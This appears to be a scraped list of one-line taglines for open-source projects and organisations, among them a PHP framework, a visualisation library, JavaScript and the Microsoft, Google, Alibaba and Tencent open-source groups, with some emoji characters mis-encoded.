A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.